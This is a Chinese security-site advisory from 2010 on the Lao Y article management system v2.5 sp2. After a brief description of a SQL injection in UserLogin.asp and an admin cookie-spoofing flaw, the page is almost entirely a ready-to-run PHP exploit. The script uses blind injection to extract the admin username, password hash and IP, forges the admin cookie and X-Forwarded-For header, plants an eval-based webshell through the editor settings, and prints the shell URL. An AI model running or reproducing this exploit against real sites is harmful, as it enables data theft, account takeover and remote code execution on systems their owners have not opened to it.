首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
老Y文章管理系统 v2.5 sp2 SQL注射&Cookies欺骗漏洞
来源:http://www.bksec.net 作者:My5t3ry 发布时间:2010-09-23  

老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞,导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当,导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。

漏洞测试exp:

<?php
ini_set("max_execution_time",0);
error_reporting(7);
function usage()
{
global $argv;
exit(
"\n--+++============================================================+++--".
"\n--+++==== ".base64_decode("wM9ZzsTVwrncwO3Ptc2zdjIuNXNwMiBCbGluZCBTUUwgSW5qZWN0aW9uIEV4cGxvaXQ=")." ====+++--".
"\n--+++============================================================+++--".
"\n\n[+] Author : My5t3ry".
"\n[+] Team : http://www.t00ls.net".
"\n[+] Blog : http://www.bksec.net".
"\n[+] Usage : php ".$argv[0]." <hostname> <path>".
"\n[+] Ex. : php ".$argv[0]." localhost /".
"\n\n");
}

function query($pos, $chr, $chs)
{
switch ($chs){
case 1:
$query = "admin' or 1=1 and (select asc(mid(Admin_Name,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 2:
$query = "admin' or 1=1 and (select asc(mid(Admin_Pass,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 3:
$query = "admin' or 1=1 and (select len(Admin_Name) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
case 4:
$query = "admin' or 1=1 and (select asc(mid(Admin_IP,{$pos},1)) from [Yao_Admin] where id=1)={$chr} and '1'='1";
break;
case 5:
$query = "admin' or 1=1 and (select len(Admin_IP) from [Yao_Admin] where id=1)={$pos} and '1'='1";
break;
}
$query = urlencode($query);
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);
if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "Username=".query($pos, $chr, $chs)."&PassWord=aaaaaa&Submit=%B5%C7%C2%BC";
$message = "POST ".$path."User/Userlogin.asp?action=login HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Cookie: ASPSESSIONIDSSCTBRDD=ILJJFNOABJJHHDMPDBAEJIGC\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

function crkusername($hostname, $path, $chs)
{
global $length,$user;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$user .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
global $pass;
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 18)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$pass .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function lengthcolumns($hostname, $path, $chs)
{
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$exit = 1;
$length = $pos;
}
else
$pos++;
if($pos==20)
exit("\r\n[+] Exploit Failed.\r\n");
}
return $length;
}


function crkadminip($hostname, $path, $chs)
{
global $iplength,$adminip;
$key = "1234567890.";
$chr = 0;
$pos = 1;
echo "[+] adminip: ";
while ($pos <= $iplength)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs);
preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/',$response,$match);

if (strlen(trim($match[1])) != 0)
{
$adminip .= $key[$chr];
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n";
}

function getshell($hostname, $path, $user, $pass, $adminip)
{
$conn = fsockopen($hostname, 80);

if (!$conn){
exit("\r\n[-] No response from $conn");
}

$postdata = "d_name=user&d_initmode=EDIT&d_fixwidth=&d_skin=light1&d_width=500&d_height=300&d_stateflag=1&d_sbedit=1&d_sbview=1&d_detectfromword=1&d_autoremote=0&d_showborder=0&d_entermode=1&d_areacssmode=0&d_memo=500px%BF%ED%B6%C8%BD%E7%C3%E6%CF%C2%B5%C4%D7%EE%BC%F2%B9%A4%BE%DF%C0%B8%B0%B4%C5%A5%2C%CA%CA%BA%CF%D3%DA%D3%CA%BC%FE%CF%B5%CD%B3%C1%F4%D1%D4%CF%B5%CD%B3%B5%C8%D6%BB%D0%E8%D7%EE%BC%F2%B5%A5%B9%A6%C4%DC%B5%C4%D3%A6%D3%C3&d_uploadobject=0&d_autodir=2&d_allowbrowse=0&d_cusdirflag=0&d_baseurl=1&d_uploaddir=..%2Fuploadfiles%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%22%3Aeval%28request%28%22my%22%29%29%27&d_imagesize=0&d_flashext=swf&d_flashsize=0&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=0&d_fileext=rar%7Czip%7Cpdf%7Cdoc%7Cxls%7Cppt%7Cchm%7Chlp&d_filesize=0&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=0&d_localext=gif%7Cjpg%7Cbmp%7Cwmz%7Cpng&d_localsize=0&d_sltsyobject=0&d_sltsyext=jpg%7Cjpeg&d_sltflag=0&d_sltminsize=300&d_sltoksize=120&d_sywzflag=0&d_sywzminwidth=100&d_sywzminheight=100&d_sytext=%B0%E6%C8%A8%CB%F9%D3%D0...&d_syfontcolor=000000&d_syshadowcolor=FFFFFF&d_syshadowoffset=1&d_syfontsize=12&d_syfontname=%CB%CE%CC%E5&d_sywzposition=1&d_sywzpaddingh=5&d_sywzpaddingv=5&d_sywztextwidth=66&d_sywztextheight=17&d_sytpflag=0&d_sytpminwidth=100&d_sytpminheight=100&d_sytpposition=1&d_sytppaddingh=5&d_sytppaddingv=5&d_sypicpath=&d_sytpopacity=1&d_sytpimagewidth=88&d_sytpimageheight=31";

$message = "POST ".$path."Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $hostname\r\n";
$message .= "X-FORWARDED-FOR: ".$adminip."\r\n";
$message .= "Cookie: ASPSESSIONIDCADSSCQQ=OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin=UserName=".$user."&UserPass=".$pass."&UserID=1\r\n";
$message .= "Content-Length: ".strlen($postdata)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $postdata;

fputs($conn, $message);
while (!feof($conn))
$reply .= fgets($conn, 1024);

fclose($conn);
return $reply;
}

if ($argc != 3)
usage();
$hostname = $argv[1];
$path = $argv[2];
echo "[+] Len(username): ";
$length = lengthcolumns($hostname, $path, 3);
echo $length."\n";
echo "[+] Len(adminip): ";
$iplength = lengthcolumns($hostname, $path, 5);
echo $iplength."\n";
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
crkadminip($hostname, $path, 4);
$reply = getshell($hostname, $path, $user, $pass, $adminip);
if(eregi(chr(209).chr(249).chr(202).chr(189).chr(208).chr(222).chr(184).chr(196).chr(179).chr(201).chr(185).chr(166),$reply))
{
echo "[+] Exploit finished.\r\n";
echo "[+] shell:http://".$hostname."/Editor/asp/config.asp?my=response.write(now())\r\n";
}
else
{
echo "[-] Exploit failed.\r\n";
}
?>


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·dede的又一个代码执行
·酷我音乐盒存在DLL劫持漏洞(mfc
·万博网站管理系统(NWEB)通杀漏洞
·慧博商城系统V6.0注入漏洞
·N点虚拟主机管理系统 致命漏洞。
·Piwik和OpenX多版本存在PHP远程
·FCKeditor二次上传拿shell
·PhpYun人才系统通杀注入及代码执
·PHP168 V6.02整站系统远程执行任
·站易企网站管理系统CTEIMS 1.1 0
·无忧购物系统ASP时尚版和通用版
·ewebeditor高版本>=5.5鸡肋0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved